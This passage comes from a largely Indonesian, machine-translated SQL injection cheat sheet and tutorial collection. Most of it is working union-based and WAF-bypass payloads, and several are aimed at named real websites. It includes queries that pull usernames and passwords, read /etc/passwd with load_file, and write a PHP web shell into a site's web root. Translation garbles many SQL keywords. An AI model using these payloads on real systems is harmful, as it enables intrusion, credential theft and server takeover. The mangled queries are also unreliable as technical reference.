3494sql=select/**/*/**/from/**/_articlequeue/**/where/**/1=2/**/and/**/1=2/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11/**/%23&dbid=a6b65df1-14b4-47a0-98f7-c7e420deda3f&cb=ZZCZXV36
3495
3496
3497~h
3498
3499-----------------------------------------------
3500UNION SELECT BASED
3501
3502-------------------------------------------------------------------------
3503
3504http://127.0.0.1/defcamp/0_o/index.php?id=2%27+and+1=0+union+select+1,2,3,4,5,(SELECT-!!-1||! !N'1'|2),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
3505
3506http://www.communityinclusion.org/staff.php?staff_id=1+and+1=2+UNION+SELECT+1,2,3,4,5,6;%00
3507
3508http://poze.exn.ro/poze.php?id=202&poze=vedete"+and+false+union+all+select+1,2,version(),4,5,6+and+"1"="1
3509
3510test.ru/test.php?id=-40+union+select+1,(select(@x)from(select(@x:=0x00),(select(0)from(members)where(0x00)in(@x:=concat(@x,0x3c62723e,mail,0x3a,pwd))))x),3,4,5,6,7,8,9--+
3511
3512http://www.marinaplast.com/page.php?id=13 div 0 union select 1,2,3,4,5
3513
3514mysite.com/index.php?id=-1+UNION+SELECT+1,convert(@@version using latin1),3,4,5--
3515
3516mysite.com/index.php?id=-1+union+select+1,group_concat(table_name),3+from+information_schema.tables+--+
3517
3518mysite.com/index.php?id=-1+union+select+1,group_concat(table_name),3+from+information_schema.tables+where+table_name>'mytable'+--+
3519
3520mysite.com/index.php?id=-1+union+select+1,group_concat(table_name),3+from+information_schema.tables+where+table_name>0x6d797461626c65+--+
3521
3522mysite.com/index.php?id=-1+union+select+1,group_concat(username,0x3a,password),3,4,5+from+0x6578616d706c656462322e61646d696e6973747261746f7273--
3523
3524mysite.com/index.php?id=-1'+union+select+concat(name,0x3a,password)+from+user+where+id=1+--+
3525
3526mysite.com/index.php?id=9086 UNION /*!SELECt*/ 1,2,grouP_ConCat(column_name),4,5,6,7,8 from /*!information_schema*/.columns where table_schema=database()--
3527
3528mysite.com/index.php?catid=-1 UNION SELECT 1,concat(table_name,CHAR(58),column_name,CHAR(58),table_schema) from information_schema.columns where column_name like CHAR(37, 112, 97, 115, 37),3,4--
3529
3530mysite.com/index.php?catid=1 union select 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version())--
3531
3532mysite.com/index.php?a=newsdetail&id=-1+union+select+1,2,3,4,5,6,7,8+from+information_schema.tables+where+table_schema=database()
3533
3534mysite.com/index.php?a=newsdetail&id=-1+union+select+1,2,3,4,5,6,7,8+from+information_schema.tables+where+table_schema=database()
3535
3536mysite.com/index.php?a=newsdetail&id=-1+union+select+1,group_concat(table_name),3,4,5,6,7,8+from+information_schema.tables+where+table_schema=database()
3537
3538mysite.com/index.php?a=newsdetail&id=-1+union+select+1,group_concat(table_name),3,4,5,6,7,8+from+information_schema.tables+where+table_schema=database()
3539
3540mysite.com/index.php?a=newsdetail&id=-1/*!AND*/1=1+UNiOn+ALl+SelECt+1,/**/2,/**/3,/**/4,/**/5,/**/6,/**/7,/**/8,/**/9/**/limit/**/1,2
3541
3542+and+1=0+union+select+ sql_no_cache +1,2,3,4,5
3543
3544http://www.microage-bathurst.ca/services.php?id=-7+union+select+1,hex(group_concat(table_name)),3,4+from+information_schema.tables+where+table_rows>0--
3545
3546http://www.imsports.msu.edu/clubs/clubDisp.php?id=-71+union+select+1,GROUP_CONCAT(concat_ws(0x3a,table_schema,TABLE_NAME)+SEPARATOR+0x3C62723E),3,4,5,6,7,8,9,10,11+from+information_schema.columns+where+column_name+like+0x257061737325+or+column_name+like+0x25702577256425--+
3547
3548http://web.riss.ru/cgi-bin/riss.cgi?action=news_show&lang=concat_ws(0x3a,user(),database(),version())+FROM+riss_news+LIMIT+1--+&id=-1+union+select+1,2,3
3549
3550http://www.wbdg.org/ccb/browse_org.php?o=70+and+1=10+union+select+111111111113371111111111,2--
3551
3552concat(@i:=0x00,@o:=0xd0a,benchmark(61,@o:=CONCAT(@o,0xd0a,(SELECT+concat(table_schema,0x2E,@i:=table_name)+FROM+information_schema.tables+WHERE+table_name>@i+order+by+table_name+LIMIT+1))),@o)
3553
3554~Ph.h4rh4r
3555
3556List of HTTP status codes
3557
3558400 ===> (Bad request)
3559401 ===> (Authorization required)
3560402 ===> (Payment required)
3561403 ===> (Forbidden)
3562404 ===> (Not found)
3563405 ===> (Method not allowed)
3564406 ===> (Not acceptable)
3565407 ===> (Proxy authentication required)
3566408 ===> (Request timeout)
3567409 ===> (Conflict)
3568410 ===> (Gone)
3569411 ===> (Length required)
3570412 ===> (Precondition failed)
3571413 ===> (Request entity too large)
3572414 ===> (Request URI too large)
3573415 ===> (Unsupported media type)
3574416 ===> (Request range not satisfiable)
3575417 ===> (Expectation failed)
3576422 ===> (Unprocessable entity)
3577423 ===> (Locked)
3578424 ===> (Failed dependency)
3579500 ===> (Internal server error)
3580501 ===> (Not Implemented)
3581502 ===> (Bad gateway)
3582503 ===> (Service unavailable)
3583504 ===> (Gateway timeout)
3584505 ===> (HTTP version not supported)
3585506 ===> (Variant also negotiates)
3586507 ===> (Insufficient storage)
3587510 ===> (Not extended)
3588
3589~{Injection type}~
3590-----------------------------------------------
3591HTML Injection - Reflected (GET)
3592HTML Injection - Reflected (POST)
3593HTML Injection - Reflected (Current URL)
3594HTML Injection - Stored (Blog)
3595iFrame Injection
3596LDAP Injection (Search)
3597Mail Header Injection (SMTP)
3598OS Command Injection
3599OS Command Injection - Blind
3600PHP Code Injection
3601Server-Side Includes (SSI) Injection
3602SQL Injection (GET/Search)
3603SQL Injection (GET/Select)
3604SQL Injection (POST/Search)
3605SQL Injection (POST/Select)
3606SQL Injection (AJAX/JSON/jQuery)
3607SQL Injection (CAPTCHA)
3608SQL Injection (Login Form/Hero)
3609SQL Injection (Login Form/User)
3610SQL Injection (SQLite)
3611SQL Injection (Drupal)
3612SQL Injection - Stored (Blog)
3613SQL Injection - Stored (SQLite)
3614SQL Injection - Stored (User-Agent)
3615SQL Injection - Stored (XML)
3616SQL Injection - Blind - Boolean-Based
3617SQL Injection - Blind - Time-Based
3618SQL Injection - Blind (SQLite)
3619SQL Injection - Blind (Web Services/SOAP)
3620XML/XPath Injection (Login Form)
3621XML/XPath Injection (Search)
3622
3623Hard WAF Bypass :)
3624
3625The Methods
3626.
3627id=1.unioN/**/distinct%20%73eleCt""a
3628id=1%.0unioN/**/distinct%20%73eleCt+-!~
3629id=1%""unioN/**/distinct%20%73eleCt@$%
3630id=1%''unioN/**/distinct%20%73eleCt@%C0%
3631id=1-.0unioN/**/distinct%20%73eleCt@%C0/
3632id=1=\NunioN/**/distinct%20%73eleCt@%FF|
3633id=1<0.unioN/**/distinct%20%73eleCt@=
3634id=1>0.unioN/**/distinct%20%73eleCt~.
3635id=1e0unioN/**/distinct%20%73eleCt""$
3636id=1^0.unioN/**/distinct%20%73eleCt!~
3637id=1|""unioN/**/distinct%20%73eleCt\N$
3638id=1|''unioN/**/distinct%20%73eleCt\N%FF
3639id=1|.0unioN/**/distinct%20%73eleCt!@
3640id=1|\NunioN/**/distinct%20%73eleCt""/
3641
3642Source: https://pastebin.com/qzNp6zha
3643
3644-Credits.
3645
3646Oracle SQL Injection dan DIOS Query
3647
3648Dalam Nama ALLAH Yang Maha Pengasih dan Penyayang
3649
3650Setelah mendapatkan banyak permintaan untuk menambahkan DIOS dan tutorial Injeksi ralated database lainnya pada Securityidiots. Di sini kita bangun dengan Oracle Based SQL Injection dan DIOS tutorial
3651
3652Berikut adalah dasar-dasar Oracle Union Based Injection yang dapat Anda gunakan untuk menyuntikkan situs berbasis oracle Union Based Oracle Injection
3653
3654Saya harap membaca Union Based Oracle Injection di atas sekarang Anda tahu cara menyuntikkan situs berbasis oracle, sekarang kita akan menyuntikkan "http://demosite.com/page.php?id=1" di tutorial kami. Mari kita lihat apakah masukan di bawah ini memberi kita kesalahan. Sebelum kita mulai menonton video dasar ini yang berisi bagaimana menggunakan beberapa pertanyaan di bawah ini, maka Anda dapat membaca tutorial yang memberikan penjelasan lebih lanjut dan beberapa contoh lain dari DIOS oracle dan injeksi.
3655
3656http://demosite.com/page.php?id=1 '
3657Sekarang jika kita memiliki kesalahan memungkinkan menyeimbangkan permintaan.
3658http://demosite.com/page.php?id=1 'pesanan oleh 1--
3659Tidak Ada Kesalahan
3660http://demosite.com/page.php?id=1 'pesanan sebesar 8--
3661Tidak Ada Kesalahan
3662http://demosite.com/page.php?id=1 'pesanan sebesar 9--
3663Kesalahan
3664Sekarang kita tahu 8 adalah kolom terakhir yang berfungsi, jadi sekarang kita bisa mencoba serikat pekerja.
3665http://demosite.com/page.php?id=1'and 0 = 1 union pilih 111,222,333,444,555,666,777,888--
3666Jika Anda mendapatkan beberapa kesalahan, maka cobalah
3667http://demosite.com/page.php?id=1'and 0 = 1 union pilih NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--
3668dan temukan kolom yang rentan secara manual, tetapi anggaplah itu juga tidak berhasil, maka cobalah ini.
3669http://demosite.com/page.php?id=1'and 0 = 1 union pilih NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL dari dual--
3670Semoga mencampur salah satu trik di atas dapat berhasil.
3671Anggaplah ketiga adalah kolom rentan, yang dicetak di layar. Mari mulai mengekstraksi data melalui kolom ketiga, pertama-tama kita akan mengekstrak versi database.
3672Untuk mendapatkan versi yang kami gunakan (pilih spanduk dari v $ version di mana rownum = 1)
3673http://demosite.com/page.php?id=1'and 0 = 1 union pilih NULL, NULL, (pilih banner dari v $ version di mana rownum = 1), NULL, NULL, NULL, NULL, NULL--
3674Sekarang mari dapatkan database saat ini menggunakan SYS.DATABASE_NAME.
3675http://demosite.com/page.php?id=1'and 0 = 1 union pilih NULL, NULL, SYS.DATABASE_NAME, NULL, NULL, NULL, NULL, NULL--
3676Sekarang sisa bagian yang akan kita lakukan menggunakan DIOS (Dump dalam satu tembakan) untuk Oracle. Tidak seperti DIOS Oracle DOS lain yang sederhana di mana kita hanya menggunakan fungsi wm_concat untuk mengekstrak data dari database.
3677http://demosite.com/page.php?id=1'and 0 = 1 union pilih NULL, NULL, (PILIH ganti (wm_concat ('<li>' || table_name), ',', '') FROM all_table), NULL, NULL, NULL, NULL, NULL--
3678Query di atas akan memberi Anda semua tabel, sekarang mari kita dapatkan kolom untuk tabel, tapi itu tidak semuanya lebih dari apa yang dapat Anda lakukan: D. Karena wm_concat terbatas dalam output, kami tidak dapat menyebutnya DIOS lengkap, jadi ya kami akan segera bekerja pada beberapa versi lain untuk DIOS Oracle, tetapi untuk sekarang di sini ada beberapa cara lain yang dapat Anda coba.
3679http://www.technoriunite.it/pages.php?p=cut-linear ') dan 1 = 0 union pilih null,' "> '|| (pilih LISTAGG (table_name,' <li> ') dalam grup ( ORDER BY table_name) dari all_tables) || '<! -', NULL, NULL dari dual - & lang = it
3680
3681http://www.beaconhouse.edu.pk/cms_main_career.php?id=9&subpg=1&pjobid=-22050 dan 0 = 1 UNION + SELECT NULL, (pilih wm_concat ('<li>' || table_name || ':' || column_name) from (pilih rownum as rnum, table_name, column_name dari all_tab_columns urutan oleh table_name desc) shell di mana rnum <120) || '<! -', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL dari dual--
3682
3683http://www.technoriunite.it/pages.php?p=cut-linear ') dan 1 = 0 union pilih null,' "> '|| (pilih wm_concat (' <li> '|| table_name ||' : '|| column_name) from (pilih rownum as rnum, table_name, column_name dari all_tab_columns order oleh table_name desc) shell di mana rnum <120) ||' <! - ', NULL, NULL dari dual - & lang = it
3684Itu semua untuk saat ini, sampai jumpa lagi dengan tutorial kami berikutnya: D
3685
3686Diko rin naget ke hahaha. share ko nalang: D
3687
3688Sumber: SecurityIdiots.com
3689
3690
3691Bypass 404 :)
3692
3693bypass1: order by x,x-- -
3694bypass2: union select x,x-- -
3695bypass3: =-x' UNION /*!SELECT*/ x,x-- -
3696bypass4: x,x,CONCAT_WS(CHAR(32,58,32),user(),database(),version())-- -
3697bypass5: /*!UNION /*!SeLeCT*/ 1,2,concat_ws(0x7c,table_name) from information_schema.tables where table_schema=database()-- -
3698bypass6: /*!UNION /*!SeLeCT*/ 1,2,concat_ws(0x7c,table_name) from information_schema./*!tables*/ where table_schema=database()-- -
3699bypass7: /*!UNION /*!SeLeCT*/ 1,2,concat_ws(0x7c,column_name) from information_schema./*!columns*/ where table_name=0x(convert to hex)-- -
3700bypass8: /*!UNION /*!SeLeCT*/ 1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x7c,abc),14,15,16,17,18 from xyz-- -
3701
3702
3703SQLi Waf Bypass
3704
3705/*!31337ConCaT*/(0x496e6a656374656420627920316d70333231756d3c62723e486f73746e616d653a20,@@hostname,0x3c62723e44617461626173653a20,database/**X**/(),0x3c62723e56657273696f6e3a20,version/**X**/(),0x3c62723e557365723a20,user/**X**/(),0x3c62723e,(/*!31337sELecT*/(@)/*!31337from*/(/*!31337sELecT*/(@:=0x00),(/*!31337sELecT*/(@)/*!31337from*/(`InFoRMAtiON_sCHeMa`.`ColUMNs`)/*!31337where*/(`TAblE_sCHemA`=DaTaBaSe/**X**/())and(@)in(@:=/*!31337CoNCat*/(@,0x3c62723e20,/*!31337TaBLe_nAMe*/,0x203a3a20,/*!31337column_name*/))))a))
3706
3707(/*!31337select*//*!31337concat*/(0x496e6a6563746564206279204e64697669633430343c62723e44617461626173653a20,database/**/(),0x3c62723e56657273696f6e3a20,version/**/(),0x3c62723e,@:=0x2d2d2d,(/*!31337select*/count(*)/*!31337from*//*!31337information_schema*/./*!31337columns*//*!31337WhErE*/(/*!31337TaBlE_ScHeMa*/!=0x696e666f726d6174696f6e5f736368656d61)AND@:=/*!31337concat*/+(@,0x3c62723e,/*!31337table_name*/,0x3a3a,/*!31337column_name*/)),@))
3708
3709+div+@div:=(/*!31337concat*/(@c:=0x00,if((/*!31337select*/+/*!31337count*/(*)/*!31337from*/+/*!31337information_schema*/./*!31337columns*/+/*!31337where*/+/*!31337table_schema*/=database/*ndivic*/()+and+@c:=/*!31337concat*/(@c,0x3c62723e, /*!31337table_name*/,0x2e,/*!31337column_name*/)),0x00,0x00),@c))+/*!31337UNION*/+ALL+/*!31337SELECT*/+
3710
3711Hai Im Ph.h4rh4r dari Blue Security Hackers
3712
3713Saya akan menunjukkan itu adalah Metode berbasis String
3714
3715Situs contoh: http://www.gwapoako.com/readnews.php?id=6
3716
37171: meninggalkan akhir 'pre check jika vuln situs dalam injeksi sql
3718http://www.gwapoako.com/readnews.php?id=6 '
3719
3720Peringatan: mysql_fetch_array () mengharapkan parameter 1 menjadi sumber daya, boolean diberikan dalam /home/jungleisland/gwapoako.com/readnews.php on line 34
3721
3722kesalahan db? berarti rentan.
3723
3724ini adalah cara mendapatkan metode berbasis string di situs
3725
37262: tingkatkan akhir Anda
3727http://www.gwapoako.com/readnews.php?id=6 ''
3728
3729tidak ada kesalahan diba? berarti Metode Berbasis String tidak akan digunakan
3730
3731kami memiliki contoh yang dapat digunakan untuk Metode Berbasis String
3732Contoh:
3733'- -
3734'- +
3735
37363: periksa apakah beberapa kolom berada di situs menggunakan pesanan oleh.
3737http://www.gwapoako.com/readnews.php?id=6 'pesanan sebesar 5-- -
3738
3739memesan dengan 5 kesalahan pesanan pero ung oleh 4 ok
3740berarti ung situs 4 kolom saya
3741
37424: menggunakan union pilih.
3743http://www.gwapoako.com/readnews.php?id=6 'serikat pilih 1,2,3,4-- -
3744
3745Contoh Anda melihat 3 dan 4, itu berarti kolom yang rentan
3746
37475: Saya akan menggunakan SANG PENCIPTA untuk membuat saya mudah
3748(Dengan peretasan)
3749DIOS = Dump Dalam Satu Tembakan
3750
3751Ini akan menggunakan kueri pra-dump pada tabel dan kolom situs. dan query n ini diletakkan pada kolom vuln pro I letakkan s 3 kolom 3 juga dapat nmn s kolom 4
3752
3753make_set (6, @ = 0x0a, (/ *! 50000select * / (1) dari (/*!50000information_schema.columns*/)where@:=make_set(511,@,0x3c6c693e,/*!50000table_name*/,/ *! 50000column_name * /)), @)
3754
3755serikat http://www.gwapoako.com/readnews.php?id=6' pilih 1,2, make_set (6, @ = 0x0a, (/ *! 50000select * / (1) dari (/ *! 50000information_schema. kolom * / di mana @ = make_set (511, @, 0x3c6c693e, / * 50000table_name * / / * 50000column_name * /)), @), 4) -!! 20%
3756
3757Selesai 🙂 Selamat Meretas 🙂
3758
3759saya akan memberitahu methodh tentang shell upload melalui query
3760Pertama-tama menemukan situs web yang rentan terhadap injeksi sql. Anda dapat menemukan situs web oleh dorks atau secara manual seperti saya telah menemukan ini.
3761Anda membutuhkan 2 hal utama:
37621- Jalur Akar dari situs web
37632- Direktori yang bisa ditulisi
3764Sebagian besar waktu, Anda akan melihat jalan root dalam kesalahan SQL situs tersebut. Seperti yang berikut.
3765Peringatan: mysql_fetch_assoc () mengharapkan parameter 1 sebagai sumber daya, boolean diberikan di /home/aeiti/public_html/admin/requires/functions.php on line 1327
3766Nah Jika situs web yang rentan tidak menunjukkan jalur root maka jangan khawatir saya akan menunjukkan cara untuk mengetahui jalur root. Dan Juga Direktori yang Dapat Ditulis.
3767http://www.jantv.in/comments/showmore.php?id=68884 '
3768Saya tidak memulai dengan abc dari SQLI Saya harap Anda tahu dasar-dasarnya. : D
3769Sekarang kita harus menemukan kolom situs web kemudian kolom yang rentan seperti situs saya memiliki 11 kolom dan 5 kolom rentan
3770http://www.jantv.in/comments/showmore.php?id=68884 'UniOn SeleCt 1,2,3,4,5,6,7,8,9,10,11-- -
3771http://www.jantv.in/comments/showmore.php?id=68884 'UniOn SeleCt 1,2,3,4, versi (), 6,7,8,9,10,11-- -
3772Mari Coba Coba Muat Berkas Situs Web
3773http://www.site.in/comments/showmore.php?id=68884 'UniOn SeleCt 1,2,3,4, load_file (' / etc / passwd '), 6,7,8,9,10, 11-- -
3774http://www.site.in/comments/showmore.php?id=68884 'UniOn SeleCt 1,2,3,4, load_file (' / etc / my.cnf '), 6,7,8,9, 10,11-- - -
3775http://www.site.in/comments/showmore.php?id=68884 'UniOn SeleCt 1,2,3,4, load_file (' / etc / group '), 6,7,8,9,10, 11-- -
3776http://www.site.in/comments/showmore.php?id=68884 'UniOn SeleCt 1,2,3,4, load_file (' / etc / services '), 6,7,8,9,10, 11-- -
3777http://www.site.in/comments/showmore.php?id=68884 'UniOn SeleCt 1,2,3,4, load_file (' / etc / hosts '), 6,7,8,9,10, 11-- -
3778Kami tidak perlu membaca file apa pun yang disebutkan di atas hanya untuk menambah pengetahuan Anda. Sekarang kita harus memeriksa hak akses file untuk pengguna saat ini untuk pertama kali ini Anda harus menemukan nama pengguna saat ini.
3779Seperti ini
3780http://www.jantv.in/comments/showmore.php?id=68884 'UniOn SeleCt 1,2,3,4, current_user, 6,7,8,9,10,11-- -
3781Nama Pengguna Saat Ini kami adalah root
3782Sekarang Periksa Privilages File untuk root Pengguna
3783http://www.jantv.in/comments/showmore.php?id=68884 'UniOn SeleCt 1,2,3,4, file_priv, 6,7,8,9,10,11 DARI mysql.user WHERE pengguna = 'root' - -
3784yang menunjukkan Y :)
3785Jika itu menunjukkan Y (ya) pada kolom rentan situs web yang berarti kita memiliki hak akses file untuk root pengguna saat ini
3786Dan jika tidak menunjukkan Y maka jangan buang waktu Anda di sana: D
3787Sekarang kita harus menemukan direktori yang bisa ditulisi untuk ini Anda dapat menggunakan google dorks juga dan pengetahuan Anda juga :)
3788tapi di sini kamu akan terjebak untuk menemukan direktori ....
3789saya tahu Anda berpikir bahwa Anda akan meletakkan 'dan Anda akan mendapatkan direktori dalam kesalahan: p :)
3790http://www.jantv.in/comments/showmore.php?id=68884 '
3791Lihat tidak ada diektori: D
3792sekarang
3793ada satu lagi trik untuk mendapatkan direktori
3794gunakan "[]" ini sebelumnya = 68884
3795seperti
3796http://www.jantv.in/comments/showmore.php?id[]=68884
3797coba lihat apa yang akan terjadi
3798lihat di sini kita mendapatkan direktori :) :)
3799sekarang kita akan mengunggah kode jahat kita di kolom vuln 3 :): D: D
3800http://www.jantv.in/comments/showmore.php?id=68884 'UniOn SeleCt 1,2,3,4, "<? system ($ _ REQUEST [' sembarang perintah u punya :) ']) ;? > ", 6,7,8,9,10,11 ke dalam file 'outfile' ke C: /wamp/www/comments/name_u_want.php '- + -
3801tapi aku punya milikku :)
3802saya hanya mengubah kode saya di Hex :)
3803http://www.jantv.in/comments/showmore.php?id=68884'+UNION+ALL+SELECT+1,2,3,4,0x3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d646 ke outfile 'C: / wamp / www / comments / any_name_u_want. php '- + -
3804maka kamu akan mendapatkan seperti itu artinya kamu meng-upload kode ur :)
3805lalu periksa
3806http://www.jantv.in/comments/any_name_u_typed.php: D
3807Anda akan mendapatkan opsi browse di mana Anda dapat memilih shell Anda
3808biarkan melihat
3809yang saya singkirkan shell saya :): D saya menemukan shell itu oleh Anas bro thnks Anas bro :)
3810ok sekarang lihat opsi unggah
3811klik di atasnya
3812sekarang lihat file berhasil diunggah :)
3813sekarang buka dengan metode yang sama seperti sebelumnya
3814http://www.jantv.in/comments/any_name_of_any_thing_u_uploaded.php
3815lihat wee berhasil meng-upload shell via query sqli :)
3816
3817Terima kasih
3818
3819http: // www.che.iitm.ac. di / dalam .php? id = 6
3820http: // www.che.iitm.ac. di / dalam .php? id = 6 'Union Select 1,2-- -
3821jika Anda mencoba untuk menyeimbangkan pesanan secara normal oleh atau grup saat itu Anda akan
3822temukan 2 kolom && this shit error "Pernyataan SELECT yang digunakan memiliki jumlah kolom yang berbeda"
3823Dalam jenis kesalahan ini kami mencoba beberapa metode seperti
3824Kolom 1.Bruteforce,
38252.do hex di semua kolom
38263. menghasilkan query + dll
38274. atau berbasis kesalahan
3828Ada opsi lain untuk menyeimbangkan permintaan seperti ini ...
3829+ GROUP + BY + 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 , 24,25,26,27,
3830Sekarang coba cara ini untuk mendapatkan kolom
3831http://www.che.iitm.ac.in/inner.php?id=6 '+ GROUP + BY
3832+ 1, 2,3, 4, 5, 6, 7,8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25 , 26, 27, -
3833Kolom tidak dikenal '8' di 'pernyataan grup'
3834jadi ada 7 kolom :)
3835Mari coba ini
3836http: // www.che.iitm.ac. di / dalam .php? id = 6 'dan 0 Union Pilih 1,2,3,4,5,6,7-- -
3837tetapi ini "Pernyataan SELECT yang digunakan memiliki jumlah kolom yang berbeda" lagi: 3
3838Sekarang coba cara Anda untuk melewati kesalahan ini
3839http://www.che.iitm.ac.in/inner.php?id=6 'dan 0 Union
3840Pilih 111, 2222,3333, 4444, 5555,6666, 7777-- -
3841tidak berfungsi
3842http: // www.che.iitm.ac. dalam / inner .php? id = 6 'dan 0 Union Select versi (), versi (), versi (), versi (), versi (), versi (), versi () - -
3843juga tidak berfungsi
3844Anda dapat mencoba lebih banyak cara lain seperti mengganti col palsu, nol atau kekuatan kasar, bt yang panjang
3845Dalam tantangan ini saya menemukan sesuatu yang berbeda ...
3846: 3
3847ok mari coba kueri yang diarahkan
3848Kita tahu dalam query yang diarahkan setiap kolom diganti dengan nol atau hex dengan satu "'" atau "1' - -"
3849http://www.che.iitm.ac.in/inner.php?id=-6 'Union
3850Pilih 1, 0x3227, 3, 4, 5, 6,7 - -
3851:)
3852ditemukan kesalahan dalam kolom no. 2
3853http: // www.che.iitm.ac. di / dalam .php? id = - 6 'Union Select 1, "2' - -", 3,4,5,6,7-- -
3854:)
3855Jika Anda mencoba ini, Anda akan menemukan kolom 4 secara otomatis
3856: D
3857atau Anda dapat melakukan penyatuan berdasarkan lagi kolom yang diarahkan ini
3858tapi saya katakan menggunakan serikat pilih hanya 1 kali
3859sekarang yang lain adalah tugas yang mudah
3860Terima kasih .....
3861
3862
3863SQL COMMENTS
3864‘ or 1=1#‘ or 1=1– –‘ or 1=1/* (MySQL < 5.1)
3865' or 1=1;%00
3866' or 1=1 union select 1,2 as `
3867' or#newline1='1'
3868or– -newline1='1'
3869/*!50000or*/1='1'
3870/*!or*/1='1
3871[-----------------------------------------------------]
3872PREFIXES
3873+ – ~ !
3874‘ or –+2=- -!!!’2
3875[-----------------------------------------------------]
3876OPERATORS
3877^, =, !=, %, /, *, &, &&, |, ||, , >>, <=, <=, ,,
3878XOR, DIV, LIKE, SOUNDS LIKE, RLIKE, REGEXP, LEAST, GREATEST, CAST, CONVERT, IS, IN, NOT, MATCH, AND, OR, BINARY,BETWEEN, ISNULL
3879[-----------------------------------------------------]
3880WHITESPACES
3881%20 %09 %0a %0b %0c %0d %a0 /**/
3882‘or+(1)sounds/**/like“1“–%a0-
3883‘union(select(1),tabe_name,(3)from`information_schema`.`tables`)#
3884[-----------------------------------------------------]
3885No Whitespace Bypass Using Comments
3886?id=1/*comment*/and/**/1=1/**/--
3887No Whitespace Bypass Using Parenthesis
3888?id=(1)and(1)=(1)--
3889[-----------------------------------------------------]
3890EXTRACT SUBSTRINGS
3891substr(‘abc’,1,1) = ‘a’
3892substr(‘abc’ from 1 for 1) = ‘a’
3893substring(‘abc’,1,1) = ‘a’
3894substring(‘abc’ from 1 for 1) = ‘a’
3895mid(‘abc’,1,1) = ‘a’
3896mid(‘abc’ from 1 for 1) = ‘a’
3897lpad(‘abc’,1,space(1)) = ‘a’
3898rpad(‘abc’,1,space(1)) = ‘a’
3899left(‘abc’,1) = ‘a’
3900reverse(right(reverse(‘abc’),1)) = ‘a’
3901insert(insert(‘abc’,1,0,space(0)),2,222,space(0)) = ‘a’
3902space(0) = trim(version()from(version()))
3903`
3904`
3905`
3906©M4c
3907
3908SQL INJECTION: BYPASSING WAF (WEB APPLICATION FIREWALL)
3909*** tutorial ini untuk menunjukkan kepada Anda bagaimana cara Bypass WAF (Aplikasi Web Firewall) ***
3910http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=-130+Union+select+1,2,3,4,5,6,7,8,9--
3911seperti yang kita lihat [pilih] adalah down double text [Mengganti kata kunci] seperti SeLselectECT ini
3912www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=-130+UnIoN+SeLselectECT+1,2,3,4,5,6,7,8,9--
3913[5] WAF Bypassing - menggunakan karakter.
3914Ada banyak sekali karakter yang tersedia yang dapat kita gunakan untuk mem-bypass filter WAF.
3915karakter berikut dapat melakukan ini:
3916|,?, ", ', *,%, £, [],;,:, \ /, $, €, () ...
3917dengan menggunakan karakter ini dalam banyak kasus / *! * / tidak difilter. Tetapi tanda * diganti dengan spasi dan kesatuan - pilih disaring. yang berarti mengganti kata kunci tidak akan berfungsi.
3918Dalam kasus ini kita dapat menggunakan karakter * untuk memisahkan kata kunci.
3919Kami akan melakukan hal logis berikutnya:
3920www. [situs] .com / index.php? id = -1 + uni * pada + sel * ect + 1,2,3,4 - + -
3921Hampir sama dengan membagi kata kunci.
3922Tetapi dalam hal ini hanya * disaring oleh itu menggantikannya sedikit pun ruang memiliki hasil yang sama seperti dalam membagi kata kunci.
3923[6] Advanced WAF Bypassing - Kapitalisasi.
3924Cara lain adalah dengan hanya memanfaatkan karakter kita.
3925Daripada unIoN serikat Dalam beberapa dasar WAF ini akan berhasil.
3926Contoh di URL:
3927www. [site] .com / index.php? id = -1 + UnIoN + SeLeCt + 1,2,3,4 - + -
3928[7] Polusi Parameter HTTP (HPP)
3929HTTP Parameter Pollution (HPP) adalah teknik penghindaran serangan Web yang memungkinkan penyerang untuk membuat permintaan HTTP untuk memanipulasi atau mengambil informasi tersembunyi. Teknik pengelakan ini didasarkan pada pemisahan vektor serangan antara beberapa contoh parameter dengan nama yang sama. Karena tidak ada RFC HTTP yang relevan mendefinisikan semantik manipulasi parameter HTTP, setiap platform pengiriman aplikasi web dapat mengatasinya secara berbeda. Secara khusus, beberapa lingkungan memproses permintaan seperti itu dengan menggabungkan nilai-nilai yang diambil dari semua contoh nama parameter dalam permintaan. Perilaku ini disalahgunakan oleh penyerang untuk mem-bypass mekanisme keamanan berbasis pola.
3930kita melihat dua vektor injeksi SQL: "Regular attack" dan "Attack using HPP". Serangan reguler menunjukkan injeksi SQL standar dalam parameter prodID. Serangan ini dapat dengan mudah diidentifikasi oleh mekanisme deteksi keamanan, seperti Firewall Aplikasi Web (WAF). Serangan kedua [Gambar 2] menggunakan HPP pada parameter prodID. Dalam hal ini, vektor serangan didistribusikan di beberapa kejadian parameter prodID. Dengan kombinasi yang tepat dari lingkungan teknologi dan server web, serangan itu berhasil. Agar WAF untuk mengidentifikasi dan memblokir vektor serangan lengkap yang diperlukan untuk juga memeriksa input gabungan.
3931http://testasp.vulnweb.com/showforum.asp?id=-1 union pilih 1,2 -
3932testasp.vulnweb.com/showforum.asp?id=-1/* & id = * / union / * & id = * / select / * & id = * / 1,2 -
3933Teknik HPP
3934Spoiler (Klik untuk Melihat)
3935[8] Teknik Bypass WAF CRLF
3936CR LF berarti "Pengangkutan Kembali, Umpan Jalur"
3937CR LF berarti "Carriage Return, Line Feed" -itu adalah hangover DOS dari masa lalu ketika beberapa perangkat memerlukan Pengembalian Pengangkutan, dan beberapa perangkat membutuhkan Feed Line untuk mendapatkan baris baru, sehingga Microsoft memutuskan untuk membuat baris memiliki kedua karakter, sehingga mereka akan menampilkan dengan benar di semua perangkat.
3938Program Windows mengharapkan format baris baru mereka di CRLF (\ r \ n). * nix hanya mengharapkan data LF (\ n). Jika Anda membuka dokumen teks Unix di Notepad pada windows, Anda akan melihat bahwa semua jeda baris menghilang dan seluruh dokumen berada pada satu baris. Itu karena Notepad mengharapkan data CRLF, dan dokumen Unix tidak memiliki karakter.
3939Ada aplikasi yang akan mengkonversi ini untuk Anda pada distro * nix standar (dos2unix dan unix2dos)
